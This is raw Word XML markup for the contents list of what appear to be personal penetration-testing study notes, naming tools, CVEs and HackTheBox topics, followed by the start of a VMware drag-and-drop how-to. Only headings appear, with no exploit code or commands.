        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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jitu5neqr0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Wireshark</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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h3umgq3eo5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Cyberchef</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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bfgzp4n09la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Zip (.zip)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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ypfxe1hnmmv">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gzip (.gz)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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kkl4gqdgfky">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.bz2</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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z8l86ky0406h">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Captcha</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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kugwkj8jiiw">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QR Code</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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i2txbze0ja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add multiple lines into file using a single echo command</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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p1npxuqdlkh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install an application as a .deb file</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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gsaeib8hvj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read the "help" output</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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ersxlr1ke5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New Attack Methods</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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jnqrc1pz57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 to POST and type juggling</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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g78begcz6q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Hex Data</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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qkun3vd8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Building a serialized payload for code execution through NodeJS</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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im3l8kgkyk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CuteNews</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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5fpc29566e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Scrolling</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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u8cnol71gj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the flag as a password for an account</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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80wftz4qh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textpattern</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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5y0nidva9r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.mysql_history</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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8rotjxos0x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Uploading files when there are multiple web servers</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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k26vyh4w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Fernet</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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iq7l7pd3z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Dirtycow2</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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lcixo4cgk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Antivirus scan and CHKROOTKIT</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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bugqzu58n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Irc unreal</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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b4chseuo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Morse Code</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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jf5m1ef3l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eLection website</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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97gh1egp4o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Serv-U FTP Server (CVE-2019–12181)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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d3sms3mji2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CMSMS (CMS Made Simple)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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6e6pfq3bh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"File does not exist" error message</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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pzov1ywja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Joomla</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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hz1o5m6ecq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ROT1 / ROT13</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020E">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fj2q2yza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Editing hexadecimal shell code</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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rmdy5vg8r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WiFi Mouse (Mouse Server)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000210">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nfx6ofc4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Mobile Mouse Server</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000211">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ubb81q1emx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Aerospike</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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rahpdmi6ci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Apache Commons Text 1.8</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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ywjz4dln4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JDWP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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0r4i6635hc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Dirtypipe (CVE-2022-0847)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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wwi9dwxrf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Usermin (webmin, MiniServ)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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npadngqzme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Vesta</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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qy3yq2nx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clamav</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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n757vh39s1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Zookeeper (port 2181)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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lcirsllpm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OpenSMTP (version of SMTP)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021A">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cy06xypwk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Cassandra-web and Cassandra Query Language (CQL)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021B">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f9ph4shucc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disk group (6(disk))</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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v3snp8ni0o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string, and -h/--help and -v/--version to find information about unknown binaries</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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d5t3yq8lwt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Gitea</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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xzhkfx63yq2">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Random stuff</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021F">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xdioxsr717t">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HackTheBox Summary</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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5jghjoax5g2z">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Penelope</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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ni6mdd2v99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How to view and change resolution of VM</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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i0e7od8otbx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Script</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022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cia3c0j127fo">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VIM</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022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q0f71ihxfyy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How to switch from terminal to powershell in Kali</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022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5nfhs1l782m">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tmux</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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zsl0hboc9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Enable Mouse Support (scrolling through terminal using mouse):</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000227">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8w3foz95hi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select text after you Enable Mouse Support</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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82vzccfaj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tmux with SSH</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022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laqjipbum4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Installing tmux</w:t>
              <w:tab/>
              <w:t xml:space="preserve">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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lt8x31ewoxav" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important</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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to drag and drop from local window to VMWare:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open terminal in VMWare</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000233">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
